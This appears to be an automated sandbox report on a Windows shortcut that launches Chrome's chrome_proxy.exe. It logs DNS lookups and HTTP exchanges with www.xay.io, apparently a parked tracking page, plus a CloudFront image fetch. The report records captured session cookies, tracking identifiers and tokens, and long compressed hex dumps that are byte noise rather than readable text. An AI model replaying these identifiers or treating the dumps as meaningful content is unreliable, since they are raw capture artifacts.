Preview:	L..................F.@.. ...$+.,....s$...d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 01:32:48.383600950 CET	53	53095	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:49.580039978 CET	53	50864	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:52.734586954 CET	51637	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:52.734630108 CET	61471	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:52.741223097 CET	53	51637	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:52.741431952 CET	53	61471	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:54.337146044 CET	58108	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:54.337932110 CET	52793	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:54.345490932 CET	53	58108	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:54.346673965 CET	53	52793	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:55.496370077 CET	57820	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:55.496562004 CET	50438	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:55.502533913 CET	53	50613	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:55.503179073 CET	53	50438	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:55.503276110 CET	53	57820	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:55.516134024 CET	50610	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:55.516228914 CET	60022	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:55.523255110 CET	53	50610	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:55.524955988 CET	53	60022	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:56.307857037 CET	53215	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:56.307990074 CET	50404	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:56.315007925 CET	53	53215	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:56.315417051 CET	53	50404	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:56.352241993 CET	65029	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:56.352519035 CET	62235	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:56.359528065 CET	53	62235	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:56.359559059 CET	53	65029	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:56.747344971 CET	53	50947	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:56.748418093 CET	59550	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:56.748795033 CET	55954	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:56.759773970 CET	53	57040	1.1.1.1	192.168.2.5
Jan 12, 2025 01:32:58.980278969 CET	60184	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:32:58.980426073 CET	50189	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:06.322417974 CET	53	61456	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:08.802447081 CET	52518	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:08.802612066 CET	57601	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:08.813198090 CET	53	57601	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:08.832911968 CET	53	52518	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:08.833792925 CET	49963	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:08.840501070 CET	53	49963	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:17.877952099 CET	52838	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:17.878287077 CET	64351	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:17.908979893 CET	53	52838	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:17.911731958 CET	53	64351	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:17.912473917 CET	60140	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:17.922468901 CET	53	60140	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:17.940782070 CET	61766	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:17.942442894 CET	64467	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:18.125622988 CET	53	64467	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:18.133632898 CET	53	61766	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:18.801858902 CET	55912	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:18.802072048 CET	62946	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:18.802701950 CET	57239	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:18.802867889 CET	65113	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:18.809709072 CET	53	55912	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:18.809720993 CET	53	57239	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:18.809861898 CET	53	65113	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:18.810563087 CET	53	62946	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.058991909 CET	55327	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.059065104 CET	65360	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.060643911 CET	50350	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.060762882 CET	50064	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.066479921 CET	53	65360	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.069333076 CET	53	55327	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.111047029 CET	61385	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.111224890 CET	58405	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.117594957 CET	53	61385	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.117907047 CET	53	58405	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.123105049 CET	63108	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.123543024 CET	50930	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.130013943 CET	53	63108	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.130368948 CET	53	50930	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.340989113 CET	53	50064	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.419233084 CET	58194	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.419399023 CET	54862	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.425085068 CET	53	50350	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.429052114 CET	53	54862	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.580213070 CET	53	58194	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.903031111 CET	61699	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.903228998 CET	58038	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:19.912235975 CET	53	58038	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:19.913382053 CET	53	61699	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.023838997 CET	54252	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.024239063 CET	54579	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.031070948 CET	53	54579	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.041753054 CET	53	54252	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.370475054 CET	55791	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.370709896 CET	60519	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.377532005 CET	53	55791	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.379225016 CET	53	60519	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.414243937 CET	53743	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.414443016 CET	63622	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.421427011 CET	53	63622	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.438380003 CET	53	53743	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.443887949 CET	59148	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.444031000 CET	54544	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.450948000 CET	53	59148	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.450993061 CET	53	54544	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.463165045 CET	55450	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.463361979 CET	61302	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:20.469870090 CET	53	61302	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:20.470154047 CET	53	55450	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:21.585886955 CET	54437	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:21.586218119 CET	62639	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:21.602087021 CET	53	62639	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:21.602556944 CET	53	54437	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:22.642978907 CET	57926	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:22.643188000 CET	62004	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:22.649811983 CET	53	62004	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:22.650177002 CET	53	57926	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:22.933054924 CET	49486	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:22.933242083 CET	49663	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:22.940538883 CET	53	49663	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:22.940982103 CET	53	49486	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:23.891293049 CET	49301	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:23.891488075 CET	63862	53	192.168.2.5	1.1.1.1
Jan 12, 2025 01:33:23.898830891 CET	53	49301	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:23.908402920 CET	53	63862	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:25.169507980 CET	53	49917	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:47.603302956 CET	53	54354	1.1.1.1	192.168.2.5
Jan 12, 2025 01:33:48.026540041 CET	53	63059	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:33:18.139549017 CET	425	OUT	GET / HTTP/1.1 Host: www.xay.io Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 12, 2025 01:33:18.774074078 CET	843	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Sun, 12 Jan 2025 00:33:18 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_XWsVgsKCLzQFWt87IxHDs6jHvdSMVNOOL2p4DQTJroDglODgPUFTAZSPdBC2E+8aswyps5sLT0HM1UKCXNG03g== X-Domain: xay.io X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: www Transfer-Encoding: chunked
Jan 12, 2025 01:33:18.774087906 CET	1236	IN	Data Raw: 31 38 62 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b 79 77 da c8 96 ff fb e5 53 28 e4 4c c0 d3 2c 12 8b c1 60 9c c1 c6 f1 12 83 ed 84 c4 86 9c 4c 8e 90 0a 10 08 89 96 c4 e6 7e fe ee f3 bb 55 25 21 6c 9c 97 bc d3 3d 7d e6 4c 1c 1b a9 96 7b 6f dd Data Ascii: 18b0[ywS(L,`L~U%!l=}L{o{'2CPL=3]c2az~lv/?h7nOoOSqsQ=4\|S>s3k;4:zWa]6+V4m2?\
Jan 12, 2025 01:33:18.774099112 CET	224	IN	Data Raw: 8f 7c 84 23 df 49 69 be f7 61 73 15 9d 4c 7e d8 14 7f 56 f4 5d 30 94 d7 d6 94 82 1f dd 89 4c bd ee 19 a3 2d 7e 86 eb c5 86 92 01 c7 df 68 6b 63 d2 1f 5b a1 0c 31 0e 4a ff 11 32 21 14 21 a5 24 64 08 84 ff 17 0f 83 14 11 05 29 ba 63 2a 29 48 ba 14 Data Ascii: \|#IiasL~V]0L-~hkc[1J2!!$d)c)H}=tq[b-t%<"V!S;l&C/Hx7z%44+\{_2PiDC5rHPmt\|'R!2#[P\|j\|?M@
Jan 12, 2025 01:33:18.774108887 CET	1236	IN	Data Raw: 69 66 14 06 1d 04 22 b4 26 61 28 3b f4 2c 53 50 49 4f 98 30 45 a4 1b b0 0c e4 65 3e 75 e0 f4 b5 01 c2 63 9a 19 46 c8 aa 2a e5 37 64 03 37 1e a5 c8 7a 6e 23 97 11 1d 01 e0 08 04 5c 80 55 72 8a 3f d3 1d 45 ab 29 dc 39 c3 65 db 83 6d 0f 1d 6a 18 d4 Data Ascii: if"&a(;,SPIO0Ee>ucF7d7zn#\Ur?E)9emjB[yDxDGUwmTlSJ89QrA+0SZ9i\<nqf:fcGWQRfeUK4^M.\!\sGw;"Pe>\(L}_LT
Jan 12, 2025 01:33:18.774118900 CET	224	IN	Data Raw: c5 bc 05 33 b3 82 41 92 4b a1 e6 8f f5 85 2e 18 58 5d b8 96 99 52 f7 6a 09 05 3c a6 2d a8 27 96 96 03 1f 94 75 67 cc 41 7d 79 e6 59 0b dd 58 67 a9 62 9e 4c 2b 49 f9 9e 99 21 a8 34 d6 d4 c2 fd 61 bd 72 a0 a6 85 4f aa 17 0a 6a 9a cc 52 3d af aa 69 Data Ascii: 3AK.X]Rj<-'ugA}yYXgbL+I!4arOjR=is94^A:&\s?6ArCo\|yr$1qWR/rZO\CzHS;.!k7pCD6C7&1/YULsd
Jan 12, 2025 01:33:18.774130106 CET	1236	IN	Data Raw: c3 f4 19 65 d7 f1 01 3c 52 39 8e 82 72 0e c1 43 61 0f c5 2c 54 ec 63 23 37 e8 9c f9 b4 cf 71 15 36 88 a2 5e d0 fa 9e 8a 84 9f 50 ef 43 dd 18 d4 5e 51 21 ff 9c 47 e5 7e 34 2c 49 51 0a 8d 69 04 81 67 f5 e7 54 00 06 6e ad b8 01 19 0d e9 90 2f 40 67 Data Ascii: e<R9rCa,Tc#7q6^PC^Q!G~4,IQigTn/@g>IvbBml7Fb'7j\Ag#QYv`("g5PZF!Yl9F?AV0, Fi!H#;-O";O\.
Jan 12, 2025 01:33:18.774142027 CET	1236	IN	Data Raw: 6a d4 b7 b7 49 f5 f7 b0 2e 3a 57 bf 9d 33 6f 9d da d8 14 e8 65 02 99 b8 dc ff 04 de de 05 ee 70 88 3c 5f 37 51 64 85 52 51 db db 39 25 37 18 4b 49 a1 c9 3e 7f bc 38 c1 f9 2a 6e 06 38 41 ea a9 db db a3 f1 d2 a2 bd 30 45 f4 8a 81 e4 77 5e 18 76 f9 Data Ascii: jI.:W3oep<_7QdRQ9%7KI>8n8A0Ew^v:N:%!2elMDy&R,$Y/-$ClsB)jt`*zk)m^%An_)opn)/6!x"Iy1yE
Jan 12, 2025 01:33:18.774179935 CET	941	IN	Data Raw: 4d 6f 15 f2 30 96 e4 86 4e eb 03 6f 32 33 1c 9d e7 45 a2 86 43 d5 db 24 15 f2 f8 94 3a b2 77 de 12 d6 63 84 94 71 51 fe 7b cf 26 04 f7 df a2 ec f9 f7 4a fb ff 97 23 07 c9 6f 79 60 40 b2 a6 3c c2 75 6d 1b a9 af df 94 67 6d 7f c8 ab 31 9b 3c b4 9a Data Ascii: Mo0No23EC$:wcqQ{&J#oy`@<umgm1<%\|Ej0 rja <j'Fl8rL}{Xs{:^_G9v]6`'%j~B}q(/2gXNPC/o<\|P
Jan 12, 2025 01:33:18.824979067 CET	469	OUT	GET /track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1 Host: www.xay.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 12, 2025 01:33:19.054160118 CET	599	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Access-Control-Allow-Origin: * Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Sun, 12 Jan 2025 00:33:18 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Custom-Track: browserjs Transfer-Encoding: chunked Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Jan 12, 2025 01:33:19.110246897 CET	356	OUT	GET /ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28ba HTTP/1.1 Host: www.xay.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 12, 2025 01:33:19.347398043 CET	856	IN	HTTP/1.1 201 Created Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Origin: Access-Control-Max-Age: 86400 Charset: utf-8 Content-Type: text/javascript;charset=UTF-8 Date: Sun, 12 Jan 2025 00:33:19 GMT Server: Caddy Server: nginx X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_AuAM5fIPJ/jwmuqepdi65PsKRcnL2NTrp1eaLRiL4fOvVXI8y+KFw9Oij7IQ7JsJbcVZnbE5/YYKtFo08aSG8w== Transfer-Encoding: chunked Data Raw: 31 30 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 10{"success":true}0
Jan 12, 2025 01:33:22.659992933 CET	668	OUT	GET /track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1 Host: www.xay.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Jan 12, 2025 01:33:22.892249107 CET	601	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Access-Control-Allow-Origin: * Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Sun, 12 Jan 2025 00:33:22 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Custom-Track: answercheck Transfer-Encoding: chunked Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Jan 12, 2025 01:33:22.932215929 CET	544	OUT	GET /favicon.ico HTTP/1.1 Host: www.xay.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Jan 12, 2025 01:33:23.154934883 CET	221	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 0 Content-Type: image/x-icon Date: Sun, 12 Jan 2025 00:33:23 GMT Etag: "66e18132-0" Last-Modified: Wed, 11 Sep 2024 11:38:26 GMT Server: Caddy Server: nginx
Jan 12, 2025 01:33:33.359129906 CET	646	OUT	GET /privacy.html HTTP/1.1 Host: www.xay.io Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Jan 12, 2025 01:33:33.582988977 CET	257	IN	HTTP/1.1 200 OK Content-Encoding: gzip Content-Type: text/html Date: Sun, 12 Jan 2025 00:33:33 GMT Etag: W/"66b20e20-365a" Last-Modified: Tue, 06 Aug 2024 11:50:56 GMT Server: Caddy Server: nginx Vary: Accept-Encoding Transfer-Encoding: chunked
Jan 12, 2025 01:33:33.583194971 CET	1236	IN	Data Raw: 31 35 30 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 dd 5b db 6e 1b 49 92 7d 1e 7f 45 0e 1b 83 95 07 12 a9 4b fb 22 59 16 96 2d d2 36 b1 b2 24 50 b4 bd 7e 5a 24 ab 92 64 8d 8a 55 d5 55 45 d1 9c 41 7f da 62 3f 69 7f 61 cf 89 cc ac 0b 45 b9 bd 0d cc cb Data Ascii: 150e[nI}EK"Y-6$P~Z$dUUEAb?iaEt2'.:rv2V~]AL??L>^:)2Jz,2;uw}Myo2}ZG~<(3av.qRQNo;2Sm2MJMf:*{
Jan 12, 2025 01:33:33.583206892 CET	1236	IN	Data Raw: 11 86 b5 62 fb 43 35 e7 01 e9 8b 04 51 75 be 51 88 32 a5 95 7b a6 26 46 2f d5 08 69 46 9e 20 52 f7 df ef ab ab c8 4c 17 26 cf 8b 32 ef aa e3 e3 7d f5 fa f0 c5 c9 6b f5 71 95 44 c1 62 1f 96 06 ad 25 1b 7b 46 eb 92 b7 b1 d1 85 21 60 90 59 2c c0 1f Data Ascii: bC5QuQ2{&F/iF RL&2}kqDb%{F!`Y,z$bN*(WeweuN`&8QQD=epkZ1/tF797E"""Cqlue3zM#ou61ohcuel\(x+l>p"vA<UU
Jan 12, 2025 01:33:33.583218098 CET	1236	IN	Data Raw: 6c a6 b7 c4 b2 de 21 38 28 17 ab 46 ae 41 4f 2f 50 5f 92 51 10 cf 9d 70 64 07 58 b3 40 0f 10 4b a1 4e b5 a8 60 e5 0e 97 d1 e2 f0 40 ab f4 58 34 fa 0f 1b 84 5f 30 32 99 a0 69 65 c0 2c 4c 69 8a 22 b5 c2 b1 ce 83 db d1 10 ed f4 66 77 52 d3 9f 4e 71 Data Ascii: l!8(FAO/P_QpdX@KN`@X4_02ie,Li"fwRNq:0myj HY6)PGX5Vaq)Z.M.CV<UA'qR;PsUGU(\|U7X<Z`btT.1qRTIg#+\b\k: `

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:33:19.077073097 CET	423	OUT	GET /themes/cleanPeppermintBlack_657d9013/img/arrows.png HTTP/1.1 Host: d38psrni17bvxu.cloudfront.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 12, 2025 01:33:19.696598053 CET	442	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 11375 Connection: keep-alive Server: nginx Date: Sat, 11 Jan 2025 11:04:58 GMT Last-Modified: Thu, 21 Mar 2024 11:48:11 GMT ETag: "65fc1e7b-2c6f" Accept-Ranges: bytes X-Cache: Hit from cloudfront Via: 1.1 3072267d18c4d0ed9e535752800364e0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P2 X-Amz-Cf-Id: aCdm451yi4OxvUXwW368v_s9KF0uaY8ZCTOiVHxAJsXCxa-ekHqKfQ== Age: 48501
Jan 12, 2025 01:33:19.696743011 CET	1236	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 dc 00 00 02 58 08 03 00 00 00 4f 6d d4 16 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 00 50 4c 54 45 00 00 00 ff Data Ascii: PNGIHDRXOmtEXtSoftwareAdobe ImageReadyqe<PLTEcdtIK^IK]IK\03IHK_acsceubdtcet0=@SHK]IL]HK\MPbNQbORc.0"&;(,@+/B04I.2F/3G-1D04H.2E04G15H26I59L8<P6:M9=Q7;N:>R:>Q;?R<@SIL\beuadtbetcftbes-0 5!6"7#8
